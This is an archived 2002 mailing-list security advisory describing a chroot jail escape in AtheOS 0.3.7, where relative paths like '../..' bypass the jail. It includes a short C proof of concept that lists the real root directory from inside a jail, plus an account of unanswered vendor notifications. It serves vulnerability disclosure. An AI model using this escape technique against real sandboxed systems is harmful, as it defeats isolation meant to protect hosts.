OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Jedi/Sector One (jpureftpd.org)
Date: Thu Feb 07 2002 - 11:52:27 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

                              -------( AtheOS )-------

      AtheOS is a free desktop operating system under the GPL license. AtheOS
    currently run on Intel, AMD and other compatible processors and support the
    Intel Multi Processor architecture.

      AtheOS home page is : http://www.atheos.cx
      
                           -------( Vulnerability )-------
                           
      A chroot() call is implemented in AtheOS, and its behavior is supposed to
    be POSIX conformant. Once chroot(<directory>) is issued by a process,
    <directory> should become the base directory ('/') with no way to go out of
    the jail. That feature is widely used to protect applications against
    unwanted directory traversals (ftp, http, etc.) .

      After a chroot() call on AtheOS, '/' indeed seems to become the base
    directory. '/path/to/file' is translated to '<directory>/path/to/file' .

      Unfortunately, relative paths aren't checked against the current chroot
    jail. Therefore, '../../../../path/to/file' will be translated to a file out
    of the chroot limits.
      
                         -------( Affected versions )-------
                           
      Version 0.3.7 seems to be affected by that bug. I didn't check any prior
    release, but they may be vulnerable as well.

                      -------( Simple proof of concept )-------

      The following code will read the content of the real '/' directory, while
    '/tmp' is supposed to be the base of the chroot jail.

    #include <stdio.h>
    #include <unistd.h>
    #include <dirent.h>

    int main(void)
    {
        register DIR *d;
        register const struct dirent *e;
        
        if (chdir("/") || chroot("/tmp") || chdir("/") ||
            (d = opendir("..")) == NULL) {
            return 1;
        }
        while ((e = readdir(d)) != NULL) {
            puts(e->d_name);
        }
        return 0;
    }

                        -------( Vendor notification )-------

      I reported the problem to the AtheOS maintainer <kurtatheos.cx> on
    January 2nd. The mail bounced (message id: 20020102235031.A20057c9x.org) on
    January 10th.

      I sent back another mail to <webmasteratheos.cx> (message id :
    20020110000235.GA31372c9x.org) . The mail bounced on January 17th.

      I finally sent a mail to the AtheOS-Developer mailing-list. No one ever
    answered.

                              -------( Impact )-------

      Don't trust chroot() on AtheOS. Users can traverse directories.
      

      Best regards,

                 -Frank. 

    -- 
 __  /*-      Frank DENIS (Jedi/Sector One) <j42-Networks.Com>     -*\  __
 \ '/    <a href="http://www.PureFTPd.Org/"> Secure FTP Server </a>    \' /
  \/  <a href="http://www.Jedi.Claranet.Fr/"> Misc. free software </a>  \/